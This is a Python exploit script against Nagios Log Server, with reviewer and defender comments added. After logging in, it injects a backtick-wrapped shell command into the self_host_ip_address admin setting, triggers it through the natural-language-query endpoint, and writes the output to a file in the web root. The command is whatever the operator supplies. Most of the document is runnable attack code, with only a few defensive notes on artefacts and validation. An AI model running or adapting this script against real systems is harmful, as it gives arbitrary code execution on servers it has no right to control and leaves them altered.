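import sys

import requests

## Usage
# $ python3 exploit.py <host> <username> <password> <cmd>
#
# <host> is the base URL and is concatenated directly with the paths below,
# so it must end with a slash (e.g. https://logserver.example/ -- constructed
# sample value).
#
# What the script demonstrates: an authenticated user who can save the admin
# "globals" form stores a backtick-wrapped shell command in the
# self_host_ip_address setting; a later request to the natural-language-query
# endpoint then causes that command to run on the server.
# NOTE(review): the server-side code is not on this page -- presumably the
# setting is interpolated into a shell command line; confirm against the
# product source.
#
# Defender notes grounded in what the script does:
#   * The injected value is persisted with saveglobals and the script never
#     restores it, so the setting stays modified after the run.
#   * Output is redirected to scripts/test.txt inside the web root and is never
#     removed by the script.
#   * Shell metacharacters (backticks here) in self_host_ip_address, and
#     unexpected files under the www/scripts directory, are the artefacts
#     this run leaves behind.
#   * The field is meant to hold an address; server-side validation as an
#     IP/hostname and avoiding shell invocation would close this path.

if len(sys.argv) < 5:
    # Originally a missing argument surfaced as a bare IndexError traceback.
    print(f"Usage: python3 {sys.argv[0]} <host> <username> <password> <cmd>")
    sys.exit(1)

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
cmd = sys.argv[4]

# Every request (including the login credentials) is routed through a local
# intercepting proxy; the script fails to connect if nothing listens there.
proxies = dict.fromkeys(['http', 'https'], 'http://127.0.0.1:8080')

login_url = f'{host}nagioslogserver/login'
globals_setting_url = f'{host}nagioslogserver/admin/globals'
nlq_url = f'{host}nagioslogserver/dashboard/natural_language_to_query?query=doesntmatter'
get_output = f'{host}nagioslogserver/scripts/test.txt'

with requests.Session() as s:
    s.proxies.update(proxies)
    # TLS certificate verification is disabled for the whole session, so the
    # credentials are sent without authenticating the server.
    s.verify = False

    # The login page sets the csrf_ls cookie; the same token is echoed back in
    # both POST bodies below.
    csrf_req = s.get(login_url)
    csrf_ls = csrf_req.cookies['csrf_ls']

    login_payload = {
        'csrf_ls': csrf_ls,
        'username': username,
        'password': password
    }
    # Redirects are not followed so the ls_session cookie can be read from the
    # login response itself.
    login_req = s.post(login_url, data=login_payload, allow_redirects=False)

    if 'ls_session' not in login_req.cookies:
        print("[-] Incorrect credentials")
        sys.exit()

    print("[+] Login worked, adding command injection to self_host_ip_address")

    cmd_injection_payload = {
        "csrf_ls": csrf_ls,
        "natural_language_query": 1,
        "nlp_disclaimer": "on",
        "ai_provider": "self_hosted",
        "self_host_ip_address": f"`{cmd}>/var/www/html/nagioslogserver/www/scripts/test.txt`",  # This is simply to view command output. Remove and replace with any command you want to execute
        "ai_port": 8000,
        "saveglobals": 1
    }
    cmd_injection_res = s.post(globals_setting_url, data=cmd_injection_payload)

    if not cmd_injection_res.ok:
        print("[-] Cmd injection probably didn't work")
        sys.exit()

    if cmd not in cmd_injection_res.text:
        print("[*] Command didn't show up in the response text, still check if it works...")

    print(f"[*] Triggering command with request to natural language query endpoint {nlq_url}")
    nlq_res = s.get(nlq_url)

    if not nlq_res.ok:
        print(f"[-] Something failed requesting {nlq_url}, check {get_output} for cmd output")

    cmd_out_res = s.get(get_output)

    # Fixed: the original re-tested cmd_injection_res here, which had already
    # been confirmed OK above, so a failed fetch of the output file was never
    # reported.
    if not cmd_out_res.ok:
        print(f"[-] No output for '{cmd}' at {get_output}")
    else:
        print(f"[+] Output of {cmd} located here: {get_output}")
        print(cmd_out_res.text)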